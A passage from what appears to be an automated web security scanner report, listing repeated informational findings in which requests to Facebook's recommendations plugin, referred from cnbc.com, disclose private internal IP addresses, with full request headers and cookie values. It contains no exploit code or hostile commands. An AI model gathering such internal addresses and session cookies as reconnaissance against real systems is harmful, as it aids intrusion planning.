Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.928. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.194.117

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.929. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.123.48

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.930. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.148.57

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.931. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.131.32

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.932. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.170.57

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.933. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.1.33

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.934. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.111.36

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.935. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.114.116

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.936. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.48.117

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.937. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.212.60

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.938. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.205.64

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.939. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.93.35

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.940. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.13.121

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.941. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.217.31

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.942. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.88.55

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.943. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.119.54

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.944. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.151.122

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.945. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.40.77

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.946. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.209.60

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.947. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.56.65

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.948. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.82.34

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.949. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.197.120

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.950. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.52.124

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.951. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.35.64

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.952. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.253.53

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.953. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.191.37

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
